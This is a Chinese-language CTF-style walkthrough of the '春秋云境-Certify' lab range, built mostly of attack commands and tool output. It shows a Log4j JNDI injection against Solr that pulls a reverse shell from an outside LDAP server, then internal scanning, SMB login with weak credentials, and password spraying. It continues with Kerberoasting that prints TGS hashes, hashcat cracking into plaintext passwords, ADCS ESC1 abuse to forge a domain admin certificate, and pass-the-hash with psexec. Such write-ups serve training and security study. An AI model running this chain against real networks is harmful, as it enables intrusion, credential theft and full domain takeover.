春秋云境-Certify

flag01

扫下有 8983 端口。

有 solr 服务,第一个想到的肯定是 log4j

1
http://39.98.126.194:8983/solr/admin/collections?action=${jndi:ldap://5lpj8t5l.eyes.sh}

GitHub - k4i-x3i0/jndiExploit-beta: 魔改版,实现冰蝎直连内存马,无需修改冰蝎客户端

1
java -jar JNDIExploit-beta.jar -i xxx
1
http://xxxx:8983/solr/admin/collections?action=${jndi:ldap://8.129.237.128:1389/Basic/ReverseShell/xxx/8083}

sudo -l 提权

flag02

扫下

1
./fscan -h 172.22.9.19/24 -eh 172.22.9.19
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.7:80
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.47:80
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.47:139
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.7:139
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.7:88
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.26:139
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.47:22
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.47:21
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.26:445
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.7:445
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.7:389
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.47:445
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.7:135
[2025-03-12 20:41:14] [SUCCESS] 端口开放 172.22.9.26:135
[2025-03-12 20:41:14] [SUCCESS] 服务识别 172.22.9.47:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-03-12 20:41:15] [SUCCESS] 服务识别 172.22.9.47:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-12 20:41:19] [SUCCESS] 服务识别 172.22.9.7:139 =>  Banner:[.]
[2025-03-12 20:41:19] [SUCCESS] 服务识别 172.22.9.7:88 =>
[2025-03-12 20:41:19] [SUCCESS] 服务识别 172.22.9.26:139 =>  Banner:[.]
[2025-03-12 20:41:19] [SUCCESS] 服务识别 172.22.9.7:80 => [http]
[2025-03-12 20:41:20] [SUCCESS] 服务识别 172.22.9.26:445 =>
[2025-03-12 20:41:20] [SUCCESS] 服务识别 172.22.9.7:445 =>
[2025-03-12 20:41:20] [SUCCESS] 服务识别 172.22.9.7:389 =>
[2025-03-12 20:41:20] [SUCCESS] 服务识别 172.22.9.47:80 => [http]
 [2025-03-12 20:42:14] [SUCCESS] 服务识别 172.22.9.47:139 =>
[2025-03-12 20:42:15] [SUCCESS] 服务识别 172.22.9.47:445 =>
[2025-03-12 20:42:20] [SUCCESS] 服务识别 172.22.9.7:135 =>
[2025-03-12 20:42:20] [SUCCESS] 服务识别 172.22.9.26:135 =>
[2025-03-12 20:42:20] [INFO] 存活端口数量: 14
[2025-03-12 20:42:20] [INFO] 开始漏洞扫描
[2025-03-12 20:42:20] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-12 20:42:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
   IPv4地址:
      └─ 172.22.9.26
[2025-03-12 20:42:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.9.7
[2025-03-12 20:42:20] [SUCCESS] NetBios 172.22.9.7      DC:XIAORANG\XIAORANG-DC
[2025-03-12 20:42:20] [SUCCESS] 网站标题 http://172.22.9.47        状态码:200 长度:10918  标题:Apache2 Ubuntu Default Page: It works
[2025-03-12 20:42:20] [SUCCESS] 网站标题 http://172.22.9.7         状态码:200 长度:703    标题:IIS Windows Server
[2025-03-12 20:42:20] [SUCCESS] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[2025-03-12 20:42:20] [SUCCESS] SMB认证成功 172.22.9.47:445 administrator:123456
[2025-03-12 20:42:20] [INFO] 系统信息 172.22.9.47 [Windows 6.1]
[2025-03-12 20:42:20] [SUCCESS] NetBios 172.22.9.47     fileserver                          Windows 6.1
[2025-03-12 20:42:20] [INFO] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[2025-03-12 20:42:20] [SUCCESS] 目标: http://172.22.9.7:80
  漏洞类型: poc-yaml-active-directory-certsrv-detect
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/EasonJim/p/6859345.html

有个 smb 账号,直接 smb 连接下。

1
2
3
4
5
smbclient.py administrator:123456@172.22.9.47
shares
use fileshare
cd secret
cat flag02.txt

flag03 & flag04

下一下那个 db:

1
get personnel.db

一个有密码,一个有 email,尝试密码喷洒下先。

1
crackmapexec.exe smb 172.22.9.26 -u .\users.txt -p .\passwords.txt

最后拿到一个有效的账号密码。

1
xiaorang.lab\zhangjian:i9XDE02pLVf

然后之前提示了 SPN,用一个测试下 spn

住一个这个 GetUserSPNs 和 GetNPUser 不一样别用错了。

1
GetUserSPNs.py -request  -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

1
2
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$92bad10671fac5c3238fdffa602123c8$0273173b46ccdcf6c3d0e1b23c3961f47588258515175327161ed66adbb69618e5233fd570ae5f18d6aa4be789972ae783a07cb972191e9bbf16933314a4ccc40fc7364c49602bf0f14a22aa85b00e73316486fd409a7e96ccbbd7301aa496a0e132c83c5b9a4538cfb85614c680f6032871ee6d253dbdf0580a616eb6ea10ae70699a5485f403496d16e1b43c47c6f08ab844cb0c87f8013a83ea2c4ca6db858111781202ac7714b5d5df32dcbcc53fd38eab3c3461d55de4c2657f2e7e9f527f00a021c40afb1fa924ba602a98b8fe46782a18fabe04672c11b4e287245f5c4ad7aeb794e8e259f487a84d68962adcf00626649aec83f7c5ad0691321baabc316f82e9eb8e7cfbf359b3b98c5d00c1d37b1ad3662ea4f10c5013199569b4d644fd762ba19a6226aa34777f061e4a3a9c2bd0d6426cb7ae883de3098092121fc72fa25d4a165fa16b3f87e8eba483563c4f72893645a9672385cd158fe3978810b58450d2f0412ee794056b3b6c2d04e199bfec8e2f170b5eb9254f6268a09491f468cf55ee5ade30ac60f8544b71d6791cebb54e43e72d37c050a8397a5d20d65276897cc432f02775e4179ab86ddbef38d5e714cb266a4588cfd631784946c299a5cc1185f2dd526a40cd8f02608858bf2511bf9226375f766982e3b8451621225adf8da2a550c959d931f2eb8808677b624f10bfcf4c4311c6d11be19027ef35f4c5d0f5e779a4c8cec012ae106bc39a0a8701a3e340a6ebb60b888f51f4b9a6b751605f01a6738096ee36fa603e24c47c08f1b87e31ee77c828a171154b28cee74d5639b8d77e0073f0f7511a54e0ae7db93928d4843ea45c5f108cef1b8c758c553d0434ea5a5c89e30b3691400353c5b1392e1184f0986c198bc1828b5a9daf2704007a02964f09391dddf6f6364c6f97734289e28df2a49d3845cb488f203e67bcf0f862811e5c733dfd8147b3e12bcffc37059775fb042c261c3aa99202b324ca1a0bb21d0a7d14b11f827971b031f74b75ebaf640c4da2b814c7a4a0806432009eaa5eb3658e0ccccd7f7d73a0117ee59701c634256286282323cdec2df1c74ec75e00eeeb3ecf65182aa71fb1cca417683b9dca1737b9231b40ccc7947aa8e66200fecc001a9c48c11a23720027a465db51d696beaebdfbbbd7d3ea4922b7d3d475f2ef4c69260dabed9c19f58737594a7f5fd6afab529743e4385e44cb3541871fa55a2c2981c815c36a8f0f81b645e28e1c06c6521ef1fa6ec7cf0cb3dd65fe70f0dc2a8e89dd66fadd0cdcda463ccec6642d05fccc56f73e7f72119aaf6be082c5c4932c59c2b2bb01f53955eea5c83884583a544f3ab231ac6dccad8390bad3ebc2bf348c193356084e8ce3341fef57bd702ee1aa53e27d4a6fb47a4fb326ab8247708ac5b6e550caa5f05f85dea79113e835371f68b1db378e7bd1ac0f908b72e905ce2b2d945108ff677d253e1705055563dd62e35d2d730355b3754ed957e7d5e18aeccf6b
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$18a70b4a838806fb79a7d51b27c1934c$ce63f956027505762ee3f0bfca7fbca9bd7bb237da2a7b82418f28b32e8a6989f7f8cc7d3d67861c0e6d4e83cf7abc7ecf12fb059fb8ef08e4866c393ece5c93bf205c1bd353d39a01790044db351bc2eeac94c997cf488519a3ec13c8a32821cc761f0b47619da5cfeb5935383087770774b331b87cbb6bb669c6d2d66cc2a541503d26a2e828fc02666e0a0aec3dc8dc8c27357ab347713764e970ce54ec93431103e75f1063b9592c6f7035da91ffec78119d0ff324656e1a026e339a1e11ea914a3d838275599613ee2538cb5921b39a523255f166b319f23e65e72c0df8f70fa37e438f980af2bc7a74e40c1b53947d11fafd5053fa227acc8761146091be8694935f323784c7309176344d6ae964103fff52e22fcf5419a4933089316d4cf6a1fa2e517ae756500468bdc7a86f5bf7bca26525ff891ed7c120261b2e23a75d0ee07bd134574cb49cd3a3bc36a806cdc43ffac9a271279a1a1ab2053a6a8f27a61dad9a6d8554259e3dbe680cd8b3ae5268ba3bac6fbd8a38d0b5e7c736efc46044bb0a7d0fd62a8c6cb71ff7807a4573b0f052edef40f062221ce6366385bbffc0371fbb4b1853024a3c74c08a5bc80738388e8f2b5b9a6eda7de8295f195737b06694205f418a91400be21271d4a45456f0a084bbb65809872dc2d7c7dc481a418d359f27d9a0a0935432317f30900746956ee9d35fb7f6fe68d6c497e4fd313cc824bf12b29eb9b0a24349da81e0ac2be99ba979a6f4d785b9cfb0f7cf78b8f7816a4dee91b403b8d1fca07d1070e9d107412a6d25fb0dde6143bdf4b50a1c49beeef4c9e04e3a52cf4da4084069fe4538a6a344fff2b94a80d1ffdfaa2ddbaa7d57b6be2306c305ed8ea09d1aa1bca3856b758aa8dc8be4ac26486d766bdfb1ec02b3e9ab05995d9f0cff97a3dff28cd82b4595f85c3310040fbc756785a898ebc6ecd66d725f2dd7e33c484d7e4321b5169ed54a0c2c95f9c5a369ae53d9caffd1ff8ec5f0ae021ad550de600236026a92b4025f49a5d5357bdf2be9f02b315310420790bc5a95d21cc11316c567fd38794e7e81f85065be6c1db06b3a7ee43be8ff1bba9cbcc17d6c75e127465bb5c2cd7fc938f1f57cd5481a63fde705105e703592b318cf1cf7780e2562cfa27f60da186ff81432ff1876602744aa7512c6a6990a7be91aa9ad8f0e826083aa85906afbf141e75e777e3b3b54608c13b25abc3bbc93900c6c5880248d39ccb8bf2b484900d57d489ead6a4843e4db56c07974a505a9db5401c4591bc68c6f0eac88588cac48cbac853b6ec68515b4ba4da76b6053b3e4f2365ad08788c6b84cae9f24a000fd8b6805f486b94b140c861f740ca4a23d4d68f77e6a8ffe04dee9960652199472c95700d58fa17707cc3780825643788ff91a579a30745fad973a347e3e708d7f500895db9241131d8ff6576a38925d682c2cdc18f7ccc78bc621a1f994ab7a2e5ea7e2dc762798d7a7d999ff81f3a24e6a4482ff64

1
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
1
2
XIAORANG\zhangxia:MyPass2@@6
XIAORANG\chenchen:@Passw0rd@

只有这个账号看不了管理员下的 flag。 然后就是要看看证书相关的。

先枚举下 AD CS(Active Directory 证书服务)

注意这个的 user 的账号是要企业邮箱号。然后要加-stdout不然没有显示

1
certipy find -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

有个 ESC1 。

ADCS 攻击之证书模板配置错误 ESC1_此证书模板上的权限不允许当前用户注册此类型的证书-CSDN 博客

打这里的时候加上 host 比较好:

用 XR Manager 这张证书为域管申请证书。

1
certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab

可能一次打不通,多试两次。

转换格式请求 TGT

1
certipy auth -pfx .\administrator.pfx -dc-ip 172.22.9.7

'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

拿到域管 hash 直接 pth 登录

1
psexec.py xiaorang/Administrator@172.22.9.26 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk

1
psexec.py xiaorang/Administrator@172.22.9.7 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk